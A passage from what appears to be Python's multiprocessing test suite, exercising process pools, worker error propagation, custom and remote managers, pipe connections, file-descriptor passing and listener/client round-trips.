    if when == -1:
        raise SayWhenError("Somebody said when")
    for value in range(total):
        if value == when:
            raise SayWhenError("Somebody said when")
        yield value
class _TestPool(BaseTestCase):
    """Tests for Pool (apply/map/imap variants, errors, lifetimes)."""

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # One shared 4-worker pool for the whole test class.
        cls.pool = cls.Pool(4)

    @classmethod
    def tearDownClass(cls):
        cls.pool.terminate()
        cls.pool.join()
        cls.pool = None
        super().tearDownClass()

    def test_apply(self):
        papply = self.pool.apply
        self.assertEqual(papply(sqr, (5,)), sqr(5))
        self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))

    def test_map(self):
        pmap = self.pool.map
        self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
        self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
                         list(map(sqr, list(range(100)))))

    def test_starmap(self):
        psmap = self.pool.starmap
        tuples = list(zip(range(10), range(9,-1, -1)))
        self.assertEqual(psmap(mul, tuples),
                         list(itertools.starmap(mul, tuples)))
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(psmap(mul, tuples, chunksize=20),
                         list(itertools.starmap(mul, tuples)))

    def test_starmap_async(self):
        tuples = list(zip(range(100), range(99,-1, -1)))
        self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
                         list(itertools.starmap(mul, tuples)))

    def test_map_async(self):
        self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
                         list(map(sqr, list(range(10)))))

    def test_map_async_callbacks(self):
        call_args = self.manager.list() if self.TYPE == 'manager' else []
        # Success path: callback receives the result list.
        self.pool.map_async(int, ['1'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(1, len(call_args))
        self.assertEqual([1], call_args[0])
        # Failure path: error_callback receives the exception.
        self.pool.map_async(int, ['a'],
                            callback=call_args.append,
                            error_callback=call_args.append).wait()
        self.assertEqual(2, len(call_args))
        self.assertIsInstance(call_args[1], ValueError)

    def test_map_unplicklable(self):
        # Issue #19425 -- failure to pickle should not cause a hang
        if self.TYPE == 'threads':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))
        class A(object):
            def __reduce__(self):
                raise RuntimeError('cannot pickle')
        with self.assertRaises(RuntimeError):
            self.pool.map(sqr, [A()]*10)

    def test_map_chunksize(self):
        try:
            self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
        except multiprocessing.TimeoutError:
            self.fail("pool.map_async with chunksize stalled on null list")

    def test_map_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # SayWhenError seen at the very first of the iterable
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
        # again, make sure it's reentrant
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(1, -1), 1)

        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, exception_throwing_generator(10, 3), 1)

        class SpecialIterable:
            # Iterable whose __next__ raises immediately but claims len 1.
            def __iter__(self):
                return self
            def __next__(self):
                raise SayWhenError
            def __len__(self):
                return 1
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)
        with self.assertRaises(SayWhenError):
            self.pool.map(sqr, SpecialIterable(), 1)

    def test_async(self):
        res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
        get = TimingWrapper(res.get)
        self.assertEqual(get(), 49)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)

    def test_async_timeout(self):
        res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
        get = TimingWrapper(res.get)
        self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
        self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)

    def test_imap(self):
        it = self.pool.imap(sqr, list(range(10)))
        self.assertEqual(list(it), list(map(sqr, list(range(10)))))

        it = self.pool.imap(sqr, list(range(10)))
        for i in range(10):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)

        it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
        for i in range(1000):
            self.assertEqual(next(it), i*i)
        self.assertRaises(StopIteration, it.__next__)

    def test_imap_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
        self.assertRaises(SayWhenError, it.__next__)

        # With chunksize 1 the first 3 results arrive before the error.
        it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
        for i in range(3):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)

        # SayWhenError seen at start of problematic chunk's results
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
        for i in range(6):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)
        it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
        for i in range(4):
            self.assertEqual(next(it), i*i)
        self.assertRaises(SayWhenError, it.__next__)

    def test_imap_unordered(self):
        it = self.pool.imap_unordered(sqr, list(range(10)))
        self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))

        it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
        self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))

    def test_imap_unordered_handle_iterable_exception(self):
        if self.TYPE == 'manager':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        # SayWhenError seen at the very first of the iterable
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)
        # again, make sure it's reentrant
        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(1, -1),
                                      1)
        self.assertRaises(SayWhenError, it.__next__)

        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(10, 3),
                                      1)
        expected_values = list(map(sqr, list(range(10))))
        with self.assertRaises(SayWhenError):
            # imap_unordered makes it difficult to anticipate the SayWhenError
            for i in range(10):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)

        it = self.pool.imap_unordered(sqr,
                                      exception_throwing_generator(20, 7),
                                      2)
        expected_values = list(map(sqr, list(range(20))))
        with self.assertRaises(SayWhenError):
            for i in range(20):
                value = next(it)
                self.assertIn(value, expected_values)
                expected_values.remove(value)

    def test_make_pool(self):
        expected_error = (RemoteError if self.TYPE == 'manager'
                          else ValueError)

        # Worker counts must be strictly positive.
        self.assertRaises(expected_error, self.Pool, -1)
        self.assertRaises(expected_error, self.Pool, 0)

        if self.TYPE != 'manager':
            p = self.Pool(3)
            try:
                self.assertEqual(3, len(p._pool))
            finally:
                p.close()
                p.join()

    def test_terminate(self):
        result = self.pool.map_async(
            time.sleep, [0.1 for i in range(10000)], chunksize=1
            )
        self.pool.terminate()
        join = TimingWrapper(self.pool.join)
        join()
        # Sanity check the pool didn't wait for all tasks to finish
        self.assertLess(join.elapsed, 2.0)

    def test_empty_iterable(self):
        # See Issue 12157
        p = self.Pool(1)

        self.assertEqual(p.map(sqr, []), [])
        self.assertEqual(list(p.imap(sqr, [])), [])
        self.assertEqual(list(p.imap_unordered(sqr, [])), [])
        self.assertEqual(p.map_async(sqr, []).get(), [])

        p.close()
        p.join()

    def test_context(self):
        if self.TYPE == 'processes':
            L = list(range(10))
            expected = [sqr(i) for i in L]
            with self.Pool(2) as p:
                r = p.map_async(sqr, L)
                self.assertEqual(r.get(), expected)
            # The context manager terminated the pool on exit, so further
            # submissions must fail.
            self.assertRaises(ValueError, p.map_async, sqr, L)

    @classmethod
    def _test_traceback(cls):
        raise RuntimeError(123) # some comment

    def test_traceback(self):
        # We want ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
        if self.TYPE == 'processes':
            with self.Pool(1) as p:
                try:
                    p.apply(self._test_traceback)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected RuntimeError')
            self.assertIs(type(exc), RuntimeError)
            self.assertEqual(exc.args, (123,))
            cause = exc.__cause__
            self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
            self.assertIn('raise RuntimeError(123) # some comment', cause.tb)

            with test.support.captured_stderr() as f1:
                try:
                    raise exc
                except RuntimeError:
                    sys.excepthook(*sys.exc_info())
            self.assertIn('raise RuntimeError(123) # some comment',
                          f1.getvalue())
            # _helper_reraises_exception should not make the error
            # a remote exception
            with self.Pool(1) as p:
                try:
                    p.map(sqr, exception_throwing_generator(1, -1), 1)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected SayWhenError')
                self.assertIs(type(exc), SayWhenError)
                self.assertIs(exc.__cause__, None)

    @classmethod
    def _test_wrapped_exception(cls):
        raise RuntimeError('foo')

    def test_wrapped_exception(self):
        # Issue #20980: Should not wrap exception when using thread pool
        with self.Pool(1) as p:
            with self.assertRaises(RuntimeError):
                p.apply(self._test_wrapped_exception)

    def test_map_no_failfast(self):
        # Issue #23992: the fail-fast behaviour when an exception is raised
        # during map() would make Pool.join() deadlock, because a worker
        # process would fill the result queue (after the result handler thread
        # terminated, hence not draining it anymore).
        t_start = time.time()

        with self.assertRaises(ValueError):
            with self.Pool(2) as p:
                try:
                    p.map(raise_large_valuerror, [0, 1])
                finally:
                    time.sleep(0.5)
                    p.close()
                    p.join()

        # check that we indeed waited for all jobs
        self.assertGreater(time.time() - t_start, 0.9)

    def test_release_task_refs(self):
        # Issue #29861: task arguments and results should not be kept
        # alive after we are done with them.
        objs = [CountedObject() for i in range(10)]
        refs = [weakref.ref(o) for o in objs]
        self.pool.map(identity, objs)

        del objs
        time.sleep(DELTA)  # let threaded cleanup code run
        self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned, check
        # they were released too.
        self.assertEqual(CountedObject.n_instances, 0)

    def test_del_pool(self):
        # The pool must be garbage-collectable once unreferenced.
        p = self.Pool(1)
        wr = weakref.ref(p)
        del p
        gc.collect()
        self.assertIsNone(wr())
def raising():
    """Always raise KeyError('key'); used to exercise error callbacks."""
    raise KeyError("key")
def unpickleable_result():
    """Return a lambda, which cannot be pickled back to the parent process."""
    return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
    """Tests for error propagation from pool workers to the parent."""

    ALLOWED_TYPES = ('processes', )

    def test_async_error_callback(self):
        """error_callback receives the exception raised by the task."""
        p = multiprocessing.Pool(2)

        scratchpad = [None]
        def errback(exc):
            scratchpad[0] = exc

        res = p.apply_async(raising, error_callback=errback)
        self.assertRaises(KeyError, res.get)
        self.assertTrue(scratchpad[0])
        self.assertIsInstance(scratchpad[0], KeyError)

        p.close()
        p.join()

    def test_unpickleable_result(self):
        from multiprocessing.pool import MaybeEncodingError
        p = multiprocessing.Pool(2)

        # Make sure we don't lose pool processes because of encoding errors.
        for iteration in range(20):

            scratchpad = [None]
            def errback(exc):
                scratchpad[0] = exc

            res = p.apply_async(unpickleable_result, error_callback=errback)
            # The unpicklable return value surfaces as MaybeEncodingError,
            # wrapping both the original exception and the offending value.
            self.assertRaises(MaybeEncodingError, res.get)
            wrapped = scratchpad[0]
            self.assertTrue(wrapped)
            self.assertIsInstance(scratchpad[0], MaybeEncodingError)
            self.assertIsNotNone(wrapped.exc)
            self.assertIsNotNone(wrapped.value)

        p.close()
        p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
    """Tests for worker recycling via maxtasksperchild."""

    ALLOWED_TYPES = ('processes', )

    def test_pool_worker_lifetime(self):
        """Workers are replaced after serving maxtasksperchild tasks."""
        p = multiprocessing.Pool(3, maxtasksperchild=10)
        self.assertEqual(3, len(p._pool))
        origworkerpids = [w.pid for w in p._pool]
        # Run many tasks so each worker gets replaced (hopefully)
        results = []
        for i in range(100):
            results.append(p.apply_async(sqr, (i, )))
        # Fetch the results and verify we got the right answers,
        # also ensuring all the tasks have completed.
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))
        # Refill the pool
        p._repopulate_pool()
        # Wait until all workers are alive
        # (countdown * DELTA = 5 seconds max startup process time)
        countdown = 50
        while countdown and not all(w.is_alive() for w in p._pool):
            countdown -= 1
            time.sleep(DELTA)
        finalworkerpids = [w.pid for w in p._pool]
        # All pids should be assigned. See issue #7805.
        self.assertNotIn(None, origworkerpids)
        self.assertNotIn(None, finalworkerpids)
        # Finally, check that the worker pids have changed
        self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
        p.close()
        p.join()

    def test_pool_worker_lifetime_early_close(self):
        # Issue #10332: closing a pool whose workers have limited lifetimes
        # before all the tasks completed would make join() hang.
        p = multiprocessing.Pool(3, maxtasksperchild=1)
        results = []
        for i in range(6):
            results.append(p.apply_async(sqr, (i, 0.3)))
        p.close()
        p.join()
        # check the results
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
    """Target class registered with the customized manager in these tests."""

    def f(self):
        """Public method with a simple checkable return value."""
        return 'f()'

    def g(self):
        """Public method that always raises, to test error propagation."""
        raise ValueError

    def _h(self):
        """Underscore method; proxies expose it only when listed explicitly."""
        return '_h()'
def baz():
    """Yield the squares of 0 through 9."""
    for n in range(10):
        yield n * n
class IteratorProxy(BaseProxy):
    """Proxy that forwards the iterator protocol to its referent."""
    # Only __next__ crosses the wire; __iter__ is answered locally.
    _exposed_ = ('__next__',)
    def __iter__(self):
        return self
    def __next__(self):
        return self._callmethod('__next__')
class MyManager(BaseManager):
    """Customized manager used by _TestMyManager."""
    pass

# 'Foo' exposes FooBar's public methods by default; 'Bar' explicitly exposes
# f and _h; 'baz' wraps the generator in an IteratorProxy.
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
    """Tests for the customized MyManager defined above."""

    ALLOWED_TYPES = ('manager',)

    def test_mymanager(self):
        manager = MyManager()
        manager.start()
        self.common(manager)
        manager.shutdown()

        # If the manager process exited cleanly then the exitcode
        # will be zero. Otherwise (after a short timeout)
        # terminate() is used, resulting in an exitcode of -SIGTERM.
        self.assertEqual(manager._process.exitcode, 0)

    def test_mymanager_context(self):
        with MyManager() as manager:
            self.common(manager)
        # bpo-30356: BaseManager._finalize_manager() sends SIGTERM
        # to the manager process if it takes longer than 1 second to stop.
        self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))

    def test_mymanager_context_prestarted(self):
        manager = MyManager()
        manager.start()
        with manager:
            self.common(manager)
        self.assertEqual(manager._process.exitcode, 0)

    def common(self, manager):
        """Exercise all three registered proxy types on *manager*."""
        foo = manager.Foo()
        bar = manager.Bar()
        baz = manager.baz()

        foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
        bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]

        # Default exposure skips underscore methods; explicit exposure wins.
        self.assertEqual(foo_methods, ['f', 'g'])
        self.assertEqual(bar_methods, ['f', '_h'])

        self.assertEqual(foo.f(), 'f()')
        self.assertRaises(ValueError, foo.g)
        self.assertEqual(foo._callmethod('f'), 'f()')
        self.assertRaises(RemoteError, foo._callmethod, '_h')

        self.assertEqual(bar.f(), 'f()')
        self.assertEqual(bar._h(), '_h()')
        self.assertEqual(bar._callmethod('f'), 'f()')
        self.assertEqual(bar._callmethod('_h'), '_h()')

        self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
# Single queue instance served to all manager clients.
_queue = pyqueue.Queue()


def get_queue():
    """Return the module-level queue shared through the manager."""
    return _queue
class QueueManager(BaseManager):
    '''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)

class QueueManager2(BaseManager):
    '''manager class which specifies the same interface as QueueManager'''
# No callable: QueueManager2 only connects to an existing server.
QueueManager2.register('get_queue')

# Serializer used by the remote-manager tests instead of pickle.
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
    """Connect to a manager server from another process, using the
    xmlrpclib serializer instead of pickle."""

    ALLOWED_TYPES = ('manager',)
    # Values chosen to exercise str / non-ASCII str / bytes round-tripping.
    values = ['hello world', None, True, 2.25,
              'hall\xe5 v\xe4rlden',
              '\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
              b'hall\xe5 v\xe4rlden',
             ]
    result = values[:]

    @classmethod
    def _putter(cls, address, authkey):
        # Child process: connect with the interface-only manager class
        # and push the test values.
        manager = QueueManager2(
            address=address, authkey=authkey, serializer=SERIALIZER
            )
        manager.connect()
        queue = manager.get_queue()
        # Note that xmlrpclib will deserialize object as a list not a tuple
        queue.put(tuple(cls.values))

    def test_remote(self):
        authkey = os.urandom(32)

        manager = QueueManager(
            address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
            )
        manager.start()

        p = self.Process(target=self._putter, args=(manager.address, authkey))
        p.daemon = True
        p.start()

        manager2 = QueueManager2(
            address=manager.address, authkey=authkey, serializer=SERIALIZER
            )
        manager2.connect()
        queue = manager2.get_queue()

        # The tuple the child put comes back as a list (see _putter note).
        self.assertEqual(queue.get(), self.result)

        # Because we are using xmlrpclib for serialization instead of
        # pickle this will cause a serialization error.
        self.assertRaises(Exception, queue.put, time.sleep)

        # Make queue finalizer run before the server is stopped
        del queue
        manager.shutdown()
class _TestManagerRestart(BaseTestCase):
    """Check that a manager can be restarted quickly on the same address."""

    @classmethod
    def _putter(cls, address, authkey):
        manager = QueueManager(
            address=address, authkey=authkey, serializer=SERIALIZER)
        manager.connect()
        queue = manager.get_queue()
        queue.put('hello world')

    def test_rapid_restart(self):
        authkey = os.urandom(32)
        manager = QueueManager(
            address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
        # get_server() is only used here to discover the bound address.
        srvr = manager.get_server()
        addr = srvr.address
        # Close the connection.Listener socket which gets opened as a part
        # of manager.get_server(). It's not needed for the test.
        srvr.listener.close()
        manager.start()

        p = self.Process(target=self._putter, args=(manager.address, authkey))
        p.start()
        p.join()
        queue = manager.get_queue()
        self.assertEqual(queue.get(), 'hello world')
        del queue
        manager.shutdown()

        # Restart immediately on the very same address.
        manager = QueueManager(
            address=addr, authkey=authkey, serializer=SERIALIZER)
        try:
            manager.start()
        except OSError as e:
            if e.errno != errno.EADDRINUSE:
                raise
            # Retry after some time, in case the old socket was lingering
            # (sporadic failure on buildbots)
            time.sleep(1.0)
            manager = QueueManager(
                address=addr, authkey=authkey, serializer=SERIALIZER)
        manager.shutdown()
#
#
#
# Empty bytes message used by the connection tests to tell the echo child
# process to exit its recv loop.
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
    """Tests for Connection objects returned by Pipe(): basic send/recv,
    recv_bytes_into, polling, and fd transfer via the reduction module."""

    ALLOWED_TYPES = ('processes', 'threads')

    @classmethod
    def _echo(cls, conn):
        # Child: echo every message back until the empty SENTINEL arrives.
        for msg in iter(conn.recv_bytes, SENTINEL):
            conn.send_bytes(msg)
        conn.close()

    def test_connection(self):
        conn, child_conn = self.Pipe()

        p = self.Process(target=self._echo, args=(child_conn,))
        p.daemon = True
        p.start()

        seq = [1, 2.25, None]
        msg = latin('hello world')
        longmsg = msg * 10
        arr = array.array('i', list(range(4)))

        if self.TYPE == 'processes':
            self.assertEqual(type(conn.fileno()), int)

        # Picklable objects round-trip through the echo child.
        self.assertEqual(conn.send(seq), None)
        self.assertEqual(conn.recv(), seq)

        self.assertEqual(conn.send_bytes(msg), None)
        self.assertEqual(conn.recv_bytes(), msg)

        if self.TYPE == 'processes':
            # recv_bytes_into(): message fits at offset 0 ...
            buffer = array.array('i', [0]*10)
            expected = list(arr) + [0] * (10 - len(arr))
            self.assertEqual(conn.send_bytes(arr), None)
            self.assertEqual(conn.recv_bytes_into(buffer),
                             len(arr) * buffer.itemsize)
            self.assertEqual(list(buffer), expected)

            # ... message fits at a non-zero byte offset ...
            buffer = array.array('i', [0]*10)
            expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
            self.assertEqual(conn.send_bytes(arr), None)
            self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
                             len(arr) * buffer.itemsize)
            self.assertEqual(list(buffer), expected)

            # ... and a too-small buffer raises BufferTooShort with the
            # complete message preserved in e.args.
            buffer = bytearray(latin(' ' * 40))
            self.assertEqual(conn.send_bytes(longmsg), None)
            try:
                res = conn.recv_bytes_into(buffer)
            except multiprocessing.BufferTooShort as e:
                self.assertEqual(e.args, (longmsg,))
            else:
                self.fail('expected BufferTooShort, got %s' % res)

        poll = TimingWrapper(conn.poll)

        # poll() with no/negative/positive timeout while no data pending.
        self.assertEqual(poll(), False)
        self.assertTimingAlmostEqual(poll.elapsed, 0)

        self.assertEqual(poll(-1), False)
        self.assertTimingAlmostEqual(poll.elapsed, 0)

        self.assertEqual(poll(TIMEOUT1), False)
        self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)

        conn.send(None)
        time.sleep(.1)

        # Data pending: poll() must return immediately.
        self.assertEqual(poll(TIMEOUT1), True)
        self.assertTimingAlmostEqual(poll.elapsed, 0)

        self.assertEqual(conn.recv(), None)

        really_big_msg = latin('X') * (1024 * 1024 * 16)  # 16Mb
        conn.send_bytes(really_big_msg)
        self.assertEqual(conn.recv_bytes(), really_big_msg)

        conn.send_bytes(SENTINEL)  # tell child to quit
        child_conn.close()

        if self.TYPE == 'processes':
            self.assertEqual(conn.readable, True)
            self.assertEqual(conn.writable, True)
            # Child closed its end, so further reads hit EOF.
            self.assertRaises(EOFError, conn.recv)
            self.assertRaises(EOFError, conn.recv_bytes)

        p.join()

    def test_duplex_false(self):
        reader, writer = self.Pipe(duplex=False)
        self.assertEqual(writer.send(1), None)
        self.assertEqual(reader.recv(), 1)
        if self.TYPE == 'processes':
            # The two ends of a simplex pipe are one-directional only.
            self.assertEqual(reader.readable, True)
            self.assertEqual(reader.writable, False)
            self.assertEqual(writer.readable, False)
            self.assertEqual(writer.writable, True)
            self.assertRaises(OSError, reader.send, 2)
            self.assertRaises(OSError, writer.recv)
            self.assertRaises(OSError, writer.poll)

    def test_spawn_close(self):
        # We test that a pipe connection can be closed by parent
        # process immediately after child is spawned.  On Windows this
        # would have sometimes failed on old versions because
        # child_conn would be closed before the child got a chance to
        # duplicate it.
        conn, child_conn = self.Pipe()

        p = self.Process(target=self._echo, args=(child_conn,))
        p.daemon = True
        p.start()
        child_conn.close()    # this might complete before child initializes

        msg = latin('hello')
        conn.send_bytes(msg)
        self.assertEqual(conn.recv_bytes(), msg)

        conn.send_bytes(SENTINEL)
        conn.close()
        p.join()

    def test_sendbytes(self):
        if self.TYPE != 'processes':
            self.skipTest('test not appropriate for {}'.format(self.TYPE))

        msg = latin('abcdefghijklmnopqrstuvwxyz')
        a, b = self.Pipe()

        # send_bytes(buf[, offset[, size]]): full message, suffix, slice.
        a.send_bytes(msg)
        self.assertEqual(b.recv_bytes(), msg)

        a.send_bytes(msg, 5)
        self.assertEqual(b.recv_bytes(), msg[5:])

        a.send_bytes(msg, 7, 8)
        self.assertEqual(b.recv_bytes(), msg[7:7+8])

        # Offset at the very end yields an empty message.
        a.send_bytes(msg, 26)
        self.assertEqual(b.recv_bytes(), latin(''))

        a.send_bytes(msg, 26, 0)
        self.assertEqual(b.recv_bytes(), latin(''))

        # Out-of-range offsets/sizes must be rejected.
        self.assertRaises(ValueError, a.send_bytes, msg, 27)

        self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)

        self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)

        self.assertRaises(ValueError, a.send_bytes, msg, -1)

        self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)

    @classmethod
    def _is_fd_assigned(cls, fd):
        # True if *fd* refers to an open file descriptor in this process.
        try:
            os.fstat(fd)
        except OSError as e:
            if e.errno == errno.EBADF:
                return False
            raise
        else:
            return True

    @classmethod
    def _writefd(cls, conn, data, create_dummy_fds=False):
        # Child: receive a file descriptor over *conn* and write *data* to it.
        if create_dummy_fds:
            # Exhaust the low fd numbers so the received fd is > 256
            # (exercises issue #11657, see test_large_fd_transfer).
            for i in range(0, 256):
                if not cls._is_fd_assigned(i):
                    os.dup2(conn.fileno(), i)
        fd = reduction.recv_handle(conn)
        if msvcrt:
            fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
        os.write(fd, data)
        os.close(fd)

    @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
    def test_fd_transfer(self):
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)

        p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
        p.daemon = True
        p.start()
        self.addCleanup(test.support.unlink, test.support.TESTFN)
        with open(test.support.TESTFN, "wb") as f:
            fd = f.fileno()
            if msvcrt:
                fd = msvcrt.get_osfhandle(fd)
            reduction.send_handle(conn, fd, p.pid)
        p.join()
        with open(test.support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"foo")

    @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
    @unittest.skipIf(sys.platform == "win32",
                     "test semantics don't make sense on Windows")
    @unittest.skipIf(MAXFD <= 256,
                     "largest assignable fd number is too small")
    @unittest.skipUnless(hasattr(os, "dup2"),
                         "test needs os.dup2()")
    def test_large_fd_transfer(self):
        # With fd > 256 (issue #11657)
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)

        p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
        p.daemon = True
        p.start()
        self.addCleanup(test.support.unlink, test.support.TESTFN)
        with open(test.support.TESTFN, "wb") as f:
            fd = f.fileno()
            # Find an unused fd number above 256 and duplicate onto it.
            for newfd in range(256, MAXFD):
                if not self._is_fd_assigned(newfd):
                    break
            else:
                self.fail("could not find an unassigned large file descriptor")
            os.dup2(fd, newfd)
            try:
                reduction.send_handle(conn, newfd, p.pid)
            finally:
                os.close(newfd)
        p.join()
        with open(test.support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"bar")

    @classmethod
    def _send_data_without_fd(self, conn):
        # NOTE(review): declared @classmethod but the first parameter is
        # named 'self'; harmless, it just receives the class object.
        os.write(conn.fileno(), b"\0")

    @unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
    @unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
    def test_missing_fd_transfer(self):
        # Check that exception is raised when received data is not
        # accompanied by a file descriptor in ancillary data.
        if self.TYPE != 'processes':
            self.skipTest("only makes sense with processes")
        conn, child_conn = self.Pipe(duplex=True)

        p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
        p.daemon = True
        p.start()
        self.assertRaises(RuntimeError, reduction.recv_handle, conn)
        p.join()

    def test_context(self):
        a, b = self.Pipe()

        with a, b:
            a.send(1729)
            self.assertEqual(b.recv(), 1729)
            if self.TYPE == 'processes':
                self.assertFalse(a.closed)
                self.assertFalse(b.closed)

        if self.TYPE == 'processes':
            # Leaving the with-block must close both ends.
            self.assertTrue(a.closed)
            self.assertTrue(b.closed)
            self.assertRaises(OSError, a.recv)
            self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
    """Tests for connection.Listener binding and context management."""

    ALLOWED_TYPES = ('processes',)

    def test_multiple_bind(self):
        # A second Listener on an already-bound address must fail.
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            self.addCleanup(l.close)
            self.assertRaises(OSError, self.connection.Listener,
                              l.address, family)

    def test_context(self):
        with self.connection.Listener() as l:
            with self.connection.Client(l.address) as c:
                with l.accept() as d:
                    c.send(1729)
                    self.assertEqual(d.recv(), 1729)

        if self.TYPE == 'processes':
            # Exiting the with-block must have closed the listener.
            self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
    """Listener/Client round-trips across every supported address family."""

    ALLOWED_TYPES = ('processes', 'threads')

    @classmethod
    def _test(cls, address):
        # Child: connect, send one greeting, disconnect.
        conn = cls.connection.Client(address)
        conn.send('hello')
        conn.close()

    def test_listener_client(self):
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            p = self.Process(target=self._test, args=(l.address,))
            p.daemon = True
            p.start()
            conn = l.accept()
            self.assertEqual(conn.recv(), 'hello')
            p.join()
            l.close()

    def test_issue14725(self):
        l = self.connection.Listener()
        p = self.Process(target=self._test, args=(l.address,))
        p.daemon = True
        p.start()
        time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle by now.  This causes
        # ConnectNamdedPipe() to fail with ERROR_NO_DATA.  See Issue
        # 14725.
        conn = l.accept()
        self.assertEqual(conn.recv(), 'hello')
        conn.close()
        p.join()
        l.close()

    def test_issue16955(self):
        # poll() must see data that was sent before the peer end was closed.
        for fam in self.connection.families:
            l = self.connection.Listener(family=fam)
            c = self.connection.Client(l.address)
            a = l.accept()
            a.send_bytes(b"hello")
            self.assertTrue(c.poll(1))
            a.close()
            c.close()
            l.close()
class _TestPoll(BaseTestCase):
    """Tests for Connection.poll() semantics: empty messages, message
    boundaries, and non-merging of consecutive sends."""

    ALLOWED_TYPES = ('processes', 'threads')

    def test_empty_string(self):
        a, b = self.Pipe()
        self.assertEqual(a.poll(), False)
        # Even an empty message must make poll() return True (and keep
        # returning True until it is received).
        b.send_bytes(b'')
        self.assertEqual(a.poll(), True)
        self.assertEqual(a.poll(), True)

    @classmethod
    def _child_strings(cls, conn, strings):
        for s in strings:
